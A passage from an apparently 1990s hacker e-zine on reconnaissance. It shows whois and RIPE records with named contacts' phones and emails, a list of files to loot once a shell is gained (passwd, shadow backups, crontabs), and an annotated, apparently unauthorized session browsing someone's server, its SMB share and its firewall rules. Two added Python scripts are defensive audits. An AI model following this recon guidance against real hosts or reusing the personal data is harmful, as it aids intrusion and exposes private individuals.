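 An administrator can read the same output for their own hosts. The Python
 sketch below is an added example, not part of the original article: it parses
 the three rpcinfo -p outputs quoted above and reports each host's role and
 the registered endpoints to filter. The function names, role labels and
 advice strings are this example's own.

```python
import re

# RPC program numbers, as they appear in the listings quoted above.
PORTMAPPER, NFS, MOUNTD, NLOCKMGR = 100000, 100003, 100005, 100021

# One data row of `rpcinfo -p`: program, version, protocol, port, optional name.
ROW = re.compile(r"^\s*(\d+)\s+(\d+)\s+(tcp|udp)\s+(\d+)(?:\s+(\S+))?\s*$")

# The three outputs shown in the article.
HOST_A = """   program vers proto   port
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100003    2   udp   2049  nfs
    100003    2   tcp   2049  nfs
    100005    1   udp    944  mountd
    100005    2   udp    944  mountd
    100005    1   tcp    947  mountd
    100005    2   tcp    947  mountd
"""
HOST_B = """   program vers proto   port
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100021    1   udp   2173  nlockmgr
    100021    3   udp   2173  nlockmgr
    100021    1   tcp   3046  nlockmgr
    100021    3   tcp   3046  nlockmgr
"""
HOST_C = ("rpcinfo: can't contact portmapper: RPC: Remote system error"
          " - Connection refused\n")

# Advice per role (wording is this example's own).
ADVICE = {
    "nfs-server": "nfsd/mountd registered: limit every export to named "
                  "clients and filter the endpoints below at the border",
    "lockd-only": "only the NFS lock manager is registered: portmapper "
                  "does not need to be reachable from outside",
    "portmapper-only": "portmapper answers but nothing NFS-related is "
                       "registered: stop it if no RPC service needs it",
    "no-rpc": "no portmapper answer: nothing can be listed over RPC",
}


def parse_rpcinfo(text):
    """Return (program, version, proto, port, name) tuples.

    The header line, blank lines and rpcinfo error lines do not match ROW,
    so an error output yields an empty list.
    """
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            prog, vers, proto, port, name = m.groups()
            rows.append((int(prog), int(vers), proto, int(port), name or ""))
    return rows


def assess(text):
    """Classify one host's output and list its registered endpoints."""
    rows = parse_rpcinfo(text)
    programs = {row[0] for row in rows}
    if not rows:
        role = "no-rpc"
    elif NFS in programs or MOUNTD in programs:
        role = "nfs-server"
    elif NLOCKMGR in programs:
        role = "lockd-only"
    else:
        role = "portmapper-only"
    # Versions collapse: the firewall only cares about protocol and port.
    ports = sorted({(proto, port) for _, _, proto, port, _ in rows})
    return {"role": role, "ports": ports}


def report(name, text):
    """Human-readable summary for one host."""
    result = assess(text)
    lines = [f"{name}: {result['role']}", "  " + ADVICE[result["role"]]]
    if result["ports"]:
        endpoints = ", ".join(f"{port}/{proto}" for proto, port in result["ports"])
        lines.append("  registered endpoints: " + endpoints)
    return "\n".join(lines)


if __name__ == "__main__":
    for name, text in (("host A", HOST_A), ("host B", HOST_B), ("host C", HOST_C)):
        print(report(name, text))
```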

     1.10. information from other organizations - internic, RIPE

 Sample output from whois spnet.net

 Access to Network Solutions' WHOIS information is provided to assist persons
 in  determining  the  contents of a domain name registration record in NSI's
 registrar  database.  The  data  in  this  record  is  provided  by  NSI for
 informational  purposes  only,  and  NSI  does  not  guarantee its accuracy.
 Compilation,  repackaging, dissemination, or other use of the WHOIS database
 in  its  entirety,  or a substantial portion thereof, is not allowed without
 NSI's prior written permission. By submitting this query, you agree to abide
 by this policy. All rights reserved.


Registrant:
Spectrum Net Ltd. (SPNET3-DOM)
   1, Universiada Blvd.
   Sofia,
   BG

   Domain Name: SPNET.NET

   Administrative Contact:
      Zahov Theodore  (ZT13-ORG)  zahov@BIOTEAM.COM
      +359 2 757125
Fax- +359 2 9753026
   Technical Contact, Zone Contact:
      Shtinkov, Peter  (PS5645)  shtinkov@SPNET.NET
      (+359 2) 757 125 (FAX) (+359 2) 975 3026
   Billing Contact:
      Zahov Theodore  (ZT13-ORG)  zahov@BIOTEAM.COM
      +359 2 757125
Fax- +359 2 9753026

   Record last updated on 26-Apr-98.
   Record created on 17-Nov-97.
   Database last updated on 15-Jul-99 09:10:38 EDT.

   Domain servers in listed order:

   NS.SPNET.NET                        212.50.0.10
   PURGATORY.SPNET.NET                212.50.0.15
   BIOLIN.BIOTEAM.COM                212.50.0.9


 And this is sample whois output for a nameserver (the internic disclaimer is
 omitted):

[No name] (NS39745-HST)

   Hostname: NS.SPNET.NET
   Address: 212.50.0.10
   System: ? running ?

   Coordinator:
      Shtinkov, Peter  (PS5645)  shtinkov@SPNET.NET
      (+359 2) 757 125 (FAX) (+359 2) 975 3026

   Record last updated on 03-Apr-98.
   Database last updated on 15-Jul-99 09:10:38 EDT.

 And, of course, the info that is shown for a technical or administrative
 contact person:

Shtinkov, Peter (PS5645)                shtinkov@SPNET.NET
   Spectrum NET
   1 Liapchev blvd.
   Sofia
   1797
   BG
   (+359 2) 757 125 (FAX) (+359 2) 975 3026

   Record last updated on 03-Mar-98.
   Database last updated on 15-Jul-99 09:10:38 EDT.

 Besides internic, one can also query, for example, the Bulgarian database,
 for which we can ask whois.ripe.net:

% Rights restricted by copyright. See http://www.ripe.net/db/dbcopyright.html

domain:      nat.bg
descr:       Naturella AD
admin-c:     MM395-RIPE
tech-c:      DD183-RIPE
zone-c:      ZB41-RIPE
notify:      hostmaster@digsys.bg
mnt-by:      BG-DOMREG
changed:     hostmaster@digsys.bg 19970317
source:      RIPE

person:      Michael Michailov
address:     Mladost I, bl. 9
address:     1784 Sofia
address:     Bulgaria
phone:       +359 2 974 32 53
fax-no:      +359 2 974 30 95
e-mail:      mike@naturella.com
nic-hdl:     MM395-RIPE
notify:      registry@naturella.com
changed:     hostmaster@ripe.net 19961022
source:      RIPE

person:      Delian Delchev
address:     Mladost I, bl. 9
address:     1784 Sofia
address:     Bulgaria
phone:       +359 2 974 32 53
fax-no:      +359 2 974 30 95
e-mail:      delian@naturella.com
nic-hdl:     DD183-RIPE
notify:      registry@naturella.com
changed:     hostmaster@ripe.net 19961022
source:      RIPE

person:      Zvezdelin Borisov
address:     Naturella AD
address:     Mladost 1 bl.9
address:     BG-1000 Sofia
address:     Bulgaria
phone:       +359 2 768891
fax-no:      +359 2 9743095
e-mail:      zen@wfpa.acad.bg
nic-hdl:     ZB41-RIPE
changed:     hostmaster@digsys.bg 19970317
source:      RIPE


 Here, for example, the format is different - it shows the contact persons
 directly, but does not give the name servers, which can however easily be
 obtained with nslookup:

Non-authoritative answer:
nat.bg        nameserver = equila.nat.bg
nat.bg        nameserver = aquila.nat.bg
nat.bg        nameserver = home.nat.bg

Authoritative answers can be found from:
equila.nat.bg        internet address = 194.12.224.33
aquila.nat.bg        internet address = 194.12.224.18
home.nat.bg        internet address = 194.12.224.34


 And, of course, we can also query the local database in .bg (digsys.bg)

 Domain information

   Domain name: nat.bg
   Organization: Agency Naturella Ltd
   Address: Mladost I, bl. 9, 1784 Sofia
   Admin contact: MM395-RIPE
   Tech contact: DD183-RIPE ZB41-RIPE
   Name servers: ns1.naturella.bg ns2.naturella.bg ns3.naturella.bg auth02.ns.uu.net
   Registration status: Registered
   Requested on: 01-02-1997
   Registered on: 21-04-1997

 Contact information

 Administrative contact

   Name: Michael Michailov
   Organization: Naturella AD
   Address: Mladost I, bl. 9, 1784 Sofia
   E-mail: mike@wfpa.acad.bg
   Phone number(s): +359 2 974 32 53
   Fax number(s): +359 2 974 30 95
   NIC handle: MM395-RIPE

 Technical contact(s)

   Name: Delian Delchev
   Organization: Naturella AD
   Address: Mladost I, bl. 9, 1784 Sofia
   E-mail: delian@naturella.com
   Phone number(s): +359 2 974 32 53
   Fax number(s): +359 2 974 30 95
   NIC handle: DD183-RIPE

   Name: Zvezdelin Borisov
   Organization: Naturella AD
   Address: Mladost I, bl. 9, 1784 Sofia
   E-mail: zen@wfpa.acad.bg
   Phone number(s): +359 2 768891
   Fax number(s): +359 2 9743095
   NIC handle: ZB41-RIPE

 Name server information

     Nameserver: ns1.naturella.bg (194.12.224.33)

     Nameserver: ns2.naturella.bg (194.12.224.34)

     Nameserver: ns3.naturella.bg (194.12.224.18)

     Nameserver: auth02.ns.uu.net


 And as it turns out, our database gives more information .. :))))

 Here is one more example - BNB...

 Domain information

   Domain name: bnb.bg
   Organization: Bulgarian National Bank
   Address: 1, Kn. Al. Batenberg sq., BG-1000 Sofia
   Admin contact: VS663-RIPE
   Tech contact: GD713-RIPE SK1461-RIPE
   Name servers: ns.bnb.bg mbox.enpro.bg ns.uk.ibm.net
   Registration status: Registered
   Requested on: 24-07-1998
   Registered on: 20-08-1998

 Contact information

 Administrative contact

   Name: Velizar Stoilov
   Organization: Bulgarian National bank
   Address: 1, Kn. Al. Batenberg sq., BG-1000 Sofia
   E-mail:
   Phone number(s): +359 2 9807371
   Fax number(s): +359 2 9802425
   NIC handle: VS663-RIPE

 Technical contact(s)

   Name: George Petkov Dimitrov
   Organization: Bulgarian National Bank
   Address: 1, Kn. Al. Batenberg sq., BG-1000 Sofia
   E-mail: bnbin004@ibm.net
   Phone number(s): +359 2 8861630 +359 2 8861632
   Fax number(s): +359 2 9802425
   NIC handle: GD713-RIPE

   Name: Stefan Georgiev Krastanov
   Organization: Bulgarian National Bank
   Address: 1, Kn. Al. Batenberg sq., BG-1000 Sofia
   E-mail: bnbin003@ibm.net
   Phone number(s): +359 2 8861266 +359 2 8866266
   Fax number(s): +359 2 9802425
   NIC handle: SK1461-RIPE

 Name server information

     Nameserver: ns.bnb.bg (62.200.195.14)

     Nameserver: mbox.enpro.bg (195.24.40.65)

     Nameserver: ns.uk.ibm.net

 This is generally one of the first steps before pulling the DNS database...


     1.11 If we have a shell ?

 If we have a shell on some machine, the places from which we can extract
 valuable information are the following: /var/log, /etc, /root, /home, as well
 as any other strange directory in / . The most interesting are perhaps the
 files in /etc such as passwd, shadow- or shadow~ (backup files), hosts,
 networks (the latter is rarely used), services (for strange ports for things
 that are generally not in services), the crontabs (what is run when, for
 example botchk-s or bnchck-s), fstab (which disk partition is used where), as
 well as any files that are unfamiliar and may give some useful information
 about the system. The /proc directory (mainly on linux) can give information
 about the physical characteristics of the machine (for example whether it is
 worth running a passwd cracker on it :))) ), as well as how the disks are
 arranged, etc. Example:

/proc/cpuinfo
processor        : 0
vendor_id        : GenuineIntel
cpu family       : 6
model            : 6
model name       : Celeron (Mendocino)
stepping         : 0
cpu MHz          : 300.688171
cache size       : 128 KB
fdiv_bug         : no
hlt_bug          : no
sep_bug          : no
f00f_bug         : no
coma_bug         : no
fpu              : yes
fpu_exception    : yes
cpuid level      : 2
wp               : yes
flags            : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 mmx osfxsr
bogomips         : 299.83

/proc/nvram
Checksum status: valid
# floppies     : 1
Floppy 0 type  : 3.5'' 1.44M
Floppy 1 type  : none
HD 0 type      : none
HD 1 type      : none
HD type 48 data: 0/0/0 C/H/S, precomp 65280, lz 0
HD type 49 data: 65535/255/113 C/H/S, precomp 65535, lz 3071
DOS base memory: 640 kB
Extended memory: 64448 kB (configured), 64448 kB (tested)
Gfx adapter    : EGA, VGA, ... (with BIOS)
FPU            : installed


 The dmesg command can also be extremely useful, because it prints all kernel
 messages from boot until now - some interesting things can be found in the
 output of this command...
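
 The files and directories named in this section can also be read as an audit
 checklist. The Python sketch below is an added example, not part of the
 original article: it walks a filesystem root and reports shadow files and
 their backups that other users can read, editor backups left in /etc, a
 /root directory open to others, and world-readable logs. The issue labels
 and the constructed demo tree are this example's own assumptions.

```python
import os
import stat
import tempfile

# The live shadow file plus the two backup names mentioned in the article.
SHADOW_NAMES = ("shadow", "shadow-", "shadow~")


def _mode(path):
    """Permission bits of path, or 0 if it cannot be stat'ed."""
    try:
        return stat.S_IMODE(os.stat(path).st_mode)
    except OSError:
        return 0


def audit(root="/"):
    """Return sorted (issue, path relative to root) findings."""
    findings = []

    def rel(path):
        return os.path.relpath(path, root)

    etc = os.path.join(root, "etc")
    if os.path.isdir(etc):
        for name in os.listdir(etc):
            path = os.path.join(etc, name)
            # Password hashes must never be readable by "other".
            if name in SHADOW_NAMES and _mode(path) & stat.S_IROTH:
                findings.append(("world-readable password hashes", rel(path)))
            # name~ is an editor backup: a stale copy nobody maintains.
            if name.endswith("~") and os.path.isfile(path):
                findings.append(("editor backup left in /etc", rel(path)))

    root_home = os.path.join(root, "root")
    if os.path.isdir(root_home) and _mode(root_home) & (stat.S_IROTH | stat.S_IXOTH):
        findings.append(("root's home open to other users", rel(root_home)))

    # os.walk yields nothing if var/log does not exist.
    for dirpath, _dirs, files in os.walk(os.path.join(root, "var", "log")):
        for name in files:
            path = os.path.join(dirpath, name)
            if _mode(path) & stat.S_IROTH:
                findings.append(("world-readable log", rel(path)))

    return sorted(findings)


def build_demo_tree(root):
    """Create a constructed sample tree with a few deliberate mistakes."""
    layout = {
        "etc/passwd": 0o644,        # expected to be world-readable
        "etc/shadow": 0o640,        # fine
        "etc/shadow-": 0o644,       # backup written with the wrong mode
        "etc/shadow~": 0o600,       # safe mode, but a stray editor backup
        "var/log/messages": 0o640,  # fine
        "var/log/secure": 0o644,    # readable by every local user
    }
    for relpath, mode in layout.items():
        path = os.path.join(root, relpath)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
        os.chmod(path, mode)        # explicit, so the umask does not matter
    root_home = os.path.join(root, "root")
    os.makedirs(root_home, exist_ok=True)
    os.chmod(root_home, 0o755)      # should not be accessible to "other"


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        for issue, path in audit(tmp):
            print(f"{issue}: {path}")
```

 Run audit("/") as root on a real host to check the live filesystem instead
 of the demo tree.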

 It is also fun to see the running processes on some machine (which can
 happen if the person has an open systat port, i.e. has installed some lousy
 slackware and has not fixed it)... here is sample output from ps auxww:

USER       PID %CPU %MEM  SIZE   RSS TTY STAT START   TIME COMMAND
bin        181  0.0  0.0   788     0  ?  SW  Jul 23   0:00 (portmap)

 <[ Whoaaa, portmapper ... :))) there may be nfs too ]>

cache      216  0.0 35.5 40420 22452  ?  S   Jul 23   1:00 (squid) -sYD
cache      219  0.0 35.5 40420 22452  ?  S   Jul 23   0:00 (squid) -sYD
cache      220  0.0 35.5 40420 22452  ?  S   Jul 23   0:00 (squid) -sYD
cache      221  0.0 35.5 40420 22452  ?  S   Jul 23   0:00 (squid) -sYD
cache      222  0.0 35.5 40420 22452  ?  S   Jul 23   0:00 (squid) -sYD
cache      223  0.0 35.5 40420 22452  ?  S   Jul 23   0:00 (squid) -sYD
cache      224  0.0 35.5 40420 22452  ?  S   Jul 23   0:00 (squid) -sYD
cache      226  0.0 35.5 40420 22452  ?  S   Jul 23   0:00 (squid) -sYD
cache      227  0.0 35.5 40420 22452  ?  S   Jul 23   0:00 (squid) -sYD
cache      228  0.0 35.5 40420 22452  ?  S   Jul 23   0:00 (squid) -sYD
cache      229  0.0 35.5 40420 22452  ?  S   Jul 23   0:00 (squid) -sYD
cache      230  0.0 35.5 40420 22452  ?  S   Jul 23   0:00 (squid) -sYD
cache      234  0.0 35.5 40420 22452  ?  S   Jul 23   0:00 (squid) -sYD
cache      235  0.0 35.5 40420 22452  ?  S   Jul 23   0:00 (squid) -sYD
cache      236  0.0 35.5 40420 22452  ?  S   Jul 23   0:00 (squid) -sYD
cache      237  0.0 35.5 40420 22452  ?  S   Jul 23   0:00 (squid) -sYD
cache      238  0.0 35.5 40420 22452  ?  S   Jul 23   0:00 (squid) -sYD
cache      240  0.0 35.5 40420 22452  ?  S   Jul 23   0:00 (squid) -sYD
cache    11998  0.0  0.8   980   508  ?  S    16:06   0:00 (dnsserver)
cache    11999  0.0  0.7   980   500  ?  S    16:06   0:00 (dnsserver)
cache    12000  0.0  0.7   980   496  ?  S    16:06   0:00 (dnsserver)
cache    12001  0.0  0.6   912   396  ?  S    16:06   0:00 (dnsserver)
cache    12002  0.0  0.6   912   396  ?  S    16:06   0:00 (dnsserver)
cache    12003  0.0  0.6   912   396  ?  S    16:06   0:00 (dnsserver)
cache    12004  0.0  0.6   912   396  ?  S    16:06   0:00 (dnsserver)

 <[  A typical squid proxy server, compiled with async IO (pthreads), using
 40MB of memory... whoa, what a glutton....]>

opers    16304  0.0  1.8  1836  1156   3 S    18:46   0:00 -bash

 <[ Someone logged in with a shell account, it seems... ]>

httpd     6816  0.0  1.5  1896  1004  ?  S    13:15   0:00 /usr/sbin/apache
httpd    13165  0.0  1.7  1896  1120  ?  S    16:48   0:00 /usr/sbin/apache
httpd    13166  0.0  1.7  1896  1116  ?  S    16:48   0:00 /usr/sbin/apache
httpd    13167  0.0  1.7  1896  1116  ?  S    16:48   0:00 /usr/sbin/apache
httpd    17078  0.0  1.7  1896  1088  ?  S    19:28   0:00 /usr/sbin/apache
httpd    26622  0.0  1.6  1896  1032  ?  S    02:49   0:00 /usr/sbin/apache
httpd    30896  0.0  1.5  1896   988  ?  S   Jul 24   0:00 /usr/sbin/apache

 <[ Everyone's favorite apache webserver .... ]>

bota       370  0.0  1.9  2336  1248  ?  S   Jul 23   0:14 eggdrop ./botche

 <[ And our even more beloved eggdrop ]>

user1    15852  0.0  1.3  1644   844  ?  S    18:15   0:00 bash /sbin/lppplogin

 <[  It seems this machine is also a dialup server, judging by the name of the
 script ... ]>

root         1  0.0  0.4   764   300  ?  S   Jul 23   0:04 init [2]
root         2  0.0  0.0     0     0  ?  SW  Jul 23   0:00 (kflushd)
root         3  0.0  0.0     0     0  ?  SW  Jul 23   0:00 (kpiod)
root         4  0.0  0.0     0     0  ?  SW  Jul 23   0:01 (kswapd)
root        13  0.0  0.0   720    28  ?  S   Jul 23   0:01 update
root       168  0.0  0.3   912   220  ?  S   Jul 23   0:14 /sbin/syslogd
root       170  0.0  0.2   804   160  ?  S   Jul 23   0:00 /sbin/klogd
root       177  0.0  0.0   740    52  ?  S   Jul 23   0:00 /sbin/kerneld
root       183  0.0  0.1   860    72  ?  S   Jul 23   0:03 /usr/sbin/inetd
root       186  0.0  1.9  2072  1220  ?  S   Jul 23   0:09 /usr/sbin/named
root       192  0.0  0.0   908     0  ?  SW  Jul 23   0:00 (lpd)
root       199  0.0  0.5  1736   340  ?  S   Jul 23   0:02 sendmail: accepting connections on port 25
root       203  0.0  2.5  3664  1604  ?  S   Jul 23   3:25 /usr/sbin/snmpd -f

 <[ SNMP daemon :))) interesting ... ]>

root       206  0.0  0.5  1292   344  ?  S   Jul 23   0:20 /usr/sbin/sshd
root       214  0.0  0.0  2832     0  ?  SW  Jul 23   0:00 (squid)
root       231  0.0  0.2   852   164  ?  S   Jul 23   0:00 /usr/sbin/cron
root       249  0.0  0.1  1836    72  ?  S   Jul 23   0:00 /usr/sbin/apache
root       265  0.0  0.0   836     0   7 SW  Jul 23   0:00 (getty)
root       266  0.0  0.0   836     0   8 SW  Jul 23   0:00 (getty)
root       267  0.0  0.0   836     0   9 SW  Jul 23   0:00 (getty)
root       268  0.0  0.0   836     0  10 SW  Jul 23   0:00 (getty)
root      1100  0.0  0.0   836    24   4 S   Jul 23   0:00 /sbin/getty 38400 tty4
root      1101  0.0  0.0   836     0   5 SW  Jul 23   0:00 (getty)
root      1102  0.0  0.0   836     0   6 SW  Jul 23   0:00 (getty)
root     10626  0.0  1.1  1844   752   2 S    15:23   0:00 -bash
root     11971  0.0  0.9  1124   596  D1 S    16:06   0:00 /usr/sbin/pppd ttyD1 38400 defaultroute noipdefault -detach 99.23.125.193: lock

 <[ The provider's link to the outside.... ]>

root     12007  0.0  1.3  1716   864   2 S    16:07   0:07 tcpdump -ni ppp1

 <[ OOOPS... tcpdump... I wonder who they are listening to right now ? :) ]>

root     15883  0.0  0.9  1124   584  ?  S    18:17   0:00 /usr/sbin/pppd -detach modem crtscts 99.23.125.193:99.23.125.202 /dev/cud4 ipparam user1

 <[  PPP connection .. pppd, to which the user's name is added as a
 parameter.. interesting, can't it use the login option of pppd ? maybe there
 is some reason for that ..... ]>

root     18310  0.0  1.6  1568  1064  ?  S    20:32   0:00 /usr/sbin/sshd
root     18312  0.0  1.8  1828  1180  p1 S    20:32   0:00 -bash
root     18317  0.0  0.5   752   324  p1 S    20:33   0:00 tail -f /usr/local/squid/logs/access.log

 <[ A typically paranoid sysadmin - constantly watching the proxy's log ]>

root     20240  0.0  0.9  1124   584  ?  S    22:17   0:00 /usr/sbin/pppd -detach modem crtscts 99.23.125.193:99.23.125.204 /dev/cud6 ipparam ppp
root     20429  0.0  0.8  1176   568  ?  S    22:24   0:00 /sbin/uugettyps cud5 38400
root     20876  0.0  0.8  1176   568  ?  S    22:35   0:00 /sbin/uugettyps cud3 38400
root     21388  0.0  0.8  1176   568  D2 S    22:53   0:00 /sbin/uugettyps ttyD2 38400
root     21509  0.0  0.8  1176   568  ?  S    22:58   0:00 /sbin/uugettyps cud7 38400
root     21595  0.0  1.6  1564  1072  ?  S    23:02   0:00 /usr/sbin/sshd
root     21597  0.0  1.8  1828  1164  p0 S    23:02   0:00 -bash
root     21766  0.0  1.5  1860   984  ?  S    23:12   0:00 sendmail: server mail.yahoo.com [214.122.34.1] cmd read
root     21902  0.1  2.0  2032  1264  ?  S    23:20   0:00 sendmail: XAA2185 mail.hotmail.com : client greeting
root     21903  0.0  0.3   852   248  ?  S    23:20   0:00 /USR/SBIN/CRON
root     21920  1.0  0.6   864   428  ?  R    23:20   0:00 /usr/bin/fping -i1000 -r5 192.168.1.11 192.168.1.12 192.168.1.2 192.168.1.8 192.168.1.77 192.168.1.88

 <[ part of autostatus, see below ]>

ppp      17917  0.0  1.3  1644   844  ?  S    20:05   0:00 bash /sbin/lppplogin
admin    21907  0.1  1.2  1624   796  ?  S    23:20   0:00 /bin/sh -c /usr/local/bin/autostatus /usr/local/etc/conf 1>/dev/null 2>/dev/null
admin    21909  0.5  1.7  1856  1136  ?  S    23:20   0:00 perl /usr/local/bin/autostatus /usr/local/etc/conf

 <[ autostatus is a monitoring tool that shows which machines are up at the
 moment ...interesting ... I wonder why he needed it so badly? ]>

 This output can reveal a loooot about the system, and interpreting it is
 not a hard task, as the comments show.......

 Another interesting example from one system:

Connected to dobrich.org.
Escape character is '^]'.

Welcome to Linux 2.0.35.


webserv login: adm
Password:
Linux 2.0.35.
Last login: Tue Jul 27 00:23:14 on ttyp0 from pool0.priovider.net.
You have mail.

bash: fortune: command not found

 <[ yeaaaah, somebody here has messed things up a bit.......]>

webserv:~# w
  1:16am  up 88 days, 10:36,  2 users,  load average: 0.02, 0.05, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
root     tty3                       1Jun99 55days  0.28s  0.28s  bash
adm      ttyp0    xxx.xxx.com       1:16am  1.00s  0.38s  0.09s  w

 <[ Blaaaaaaah 88 days without a reboot..... and root idle for 55! ]>

 (Note by Iron - on mine I have made it to 34 days so far without a UPS...
 Let's see when the damned power will hit me :-)

webserv:~# ls /
System.map   boot/        dev/         home/        lost+found/  nohup.out root/        sysbin/      usr/         vmlinuz
bin/         cdrom/       etc/         lib/         mnt/         proc/     sbin/        tmp/         var/         vmlinuz.old

 <[ /sysbin? never heard of it ...let's check what is in there..... ]>

webserv:~# cd /sysbin
webserv:/sysbin# ls -l
total 9
-rwx------   1 root     root          109 Apr 21 14:25 conn.inet*
-rwx------   1 root     root          110 Oct 24  1995 conn.inet.dialup*
-rwx------   1 root     root           97 Oct 24  1995 conn.inet.leased*
-rwx------   1 root     root          164 Apr 16 12:47 dial*
-rwx------   1 root     root           25 Dec 17  1998 inet*
-rwx------   1 root     root           75 Mar 26 14:35 run_dup*
-rwx------   1 root     root          119 Mar 26 14:41 run_lsl*
-rwxr-xr-x   1 root     root          166 Mar 11 16:41 squid_check*

 <[ One single visible file.....I wonder how it got forgotten .... ]>

webserv:/sysbin# cat squid_check
#!/bin/bash
PATH=$PATH:/usr/bin:/bin:/sbin:/usr/sbin
if ! ps -auxww |grep cache|grep squid ; then
    /usr/local/squid/bin/RunCache &
fi
killall -HUP named >/dev/null

 <[ A simple system script for some purpose - it checks whether the proxy
 server is running and starts it if it is not, and restarts the nameserver
 ...who knows why .......]>

webserv:/sysbin# mount
/dev/hda3 on / type ext2 (rw)
none on /proc type proc (rw)
/dev/hdc1 on /var type ext2 (rw)
//myserv/temp on /mnt type smbfs (0)

 <[ STOOOOOOOP! A connection to a Samba server ??? ]>

webserv:/sysbin# df
Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda3             466424  366134    76199     83%   /
/dev/hdc1             200181   44698   145145     24%   /var
//myserv/temp        4233088 1917696  2315392     45%   /mnt

 <[ And there is even free space ..... ]>

webserv:/sysbin# cd /mnt
webserv:/mnt# ls -l
total 16354
-rwxr-xr-x   1 root     root       153331 Jul  6 14:43 addressbook-0.7.tar.gz*
-rwxr-xr-x   1 root     root       448628 Jul  8 10:17 apt_0.3.11.deb*
drwxr-xr-x   1 root     root          512 Jun 25 10:55 catalog/
-rwxr-xr-x   1 root     root       547742 Jul  8 03:08 gconv-modules_2.1.1-12.deb*
-rwxr-xr-x   1 root     root          304 Feb  4 14:41 home.htm*
-rwxr-xr-x   1 root     root         4753 Jul  5 09:44 kernel-doc-2.2.10.html*
-rwxr-xr-x   1 root     root       867106 Jul  5 10:04 kernel-doc-2.2.10_2.2.10-1.deb*
-rwxr-xr-x   1 root     root      1628462 Jul  5 13:03 kernel-headers-2.2.10_2.2.10-1.deb*
-rwxr-xr-x   1 root     root      3722120 Jul  2 11:28 kernel-image-2.2.10_2.2.10-1.deb*
-rwxr-xr-x   1 root     root       492036 Jul  7 16:14 kirc-0_9_5-04_tar*
-rwxr-xr-x   1 root     root       132262 Jul  8 02:53 ldso_1.9.11-2.deb*
-rwxr-xr-x   1 root     root      1544850 Jul  7 19:43 libc6_2.1.1-12.deb*
-rwxr-xr-x   1 root     root        40224 Jul  8 11:23 libesd0_0.2.10-0.19990424.6.2.deb*
-rwxr-xr-x   1 root     root        61728 Jul  8 12:07 libglib1.2_1.2.3-1.deb*
-rwxr-xr-x   1 root     root       610620 Jul  8 11:53 libgtk1.2_1.2.3-1.deb*
-rwxr-xr-x   1 root     root       222578 Jul  8 11:59 libmikmod1_3.1.6-2.deb*
-rwxr-xr-x   1 root     root       136622 Jul  7 18:18 libncurses4_4.2-3.2.deb*
-rwxr-xr-x   1 root     root       110024 Jul  8 10:22 libstdc++2.9-glibc2.1_2.91.66-2.deb*
-rwxr-xr-x   1 root     root      1576972 Jul  8 05:04 libwine0.0.971116_0.0.990704-1.deb*
-rwxr-xr-x   1 root     root       707948 Jul  8 13:04 locales_2.1.1-12.deb*
-rwxr-xr-x   1 root     root       393406 Jul  8 03:25 mesag3_3.0-1.deb*
-rwxr-xr-x   1 root     root         3990 Feb  4 15:16 nav(1).htm*
-rwxr-xr-x   1 root     root        80409 Jul  6 14:57 tkMOO-light-0.3.20-dev-05.tar.gz*
-rwxr-xr-x   1 root     root       631472 Jul  6 15:21 tm0-3-19s.zip*
-rwxr-xr-x   1 root     root         3732 Feb  4 15:15 usl1.htm*
-rwxr-xr-x   1 root     root         2863 Feb  4 14:40 usl3.htm*
-rwxr-xr-x   1 root     root         2723 Feb  4 14:40 uslugi(1).htm*
-rwxr-xr-x   1 root     root         6138 Feb  4 15:15 uslugi1.htm*
-rwxr-xr-x   1 root     root        20125 Jul  9 12:07 vd_tr942.zip*
drwxr-xr-x   1 root     root          512 Jun 21 10:12 web/
-rwxr-xr-x   1 root     root       442118 Jul  5 16:09 wine_0.0.990613-1.deb*
-rwxr-xr-x   1 root     root       442266 Jul  7 17:57 wine_0.0.990704-1.deb*
-rwxr-xr-x   1 root     root       245830 Jul  8 02:34 xfree86-common_3.3.3.1-10.deb*
-rwxr-xr-x   1 root     root       999182 Jul  8 03:15 xlib6g_3.3.3.1-10.deb*
-rwxr-xr-x   1 root     root       391330 Jul  8 11:21 xmms_0.9.1-0.1.deb*
-rwxr-xr-x   1 root     root        53430 Jul  8 03:26 xpm4g_3.4k-1.deb*

 <[ Sooooo....a Debian fan, judging by the many deb packages...for lack of
 space on the little Linux box he keeps his stuff on the big SMB server
 (which seems to be running NT) ]>

webserv:/sysbin# ipfwadm -Il
IP firewall input rules, default policy: accept
type  prot source               destination          ports
acc   all  ppp0.users.org     anywhere             n/a
acc   tcp  srv.provider.net      anywhere             proxy -> any
acc   all  192.168.15.9         anywhere             n/a
acc   all  192.168.15.8         anywhere             n/a
acc   all  user205.users.org  anywhere             n/a
acc   all  user210.users.org  anywhere             n/a
acc   all  maniac.users.org   anywhere             n/a
acc   all  myserv.users.org   anywhere             n/a
acc   all  evgeny.users.org   anywhere             n/a
acc   tcp  localnet-1/16        users.org          any -> telnet
acc   tcp  localnet-1/16        users.org          any -> www
acc   tcp  localnet-1/16        anywhere             any -> 6667
acc   tcp  localnet-1/16        anywhere             any -> smtp
acc   tcp  localnet-1/16        anywhere             any -> auth
acc   tcp  localnet-1/16        anywhere             any -> pop3
rej   tcp  localnet-1.users.org/24 anywhere             any -> any

 <[ Something interesting - firewalls ....... there are users who can do
 anything, while the rest are cut down to a few ports - www on the local
 server, smtp, mail and telnet (why???)...It also looks like they have some
 dial-up that is allowed to go everywhere ..... ]>

 >> EOA <<

 -ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#07ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
  [ a r t i c l e ]                                         [ a u t h o r ]
  Denial of Service Attacks                                        IronCode
 -ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-

 Lately, in disputes of every kind on the net, and sometimes just for the
 fun of it, a phenomenon called Denial of Service attacks (or simply DoS),
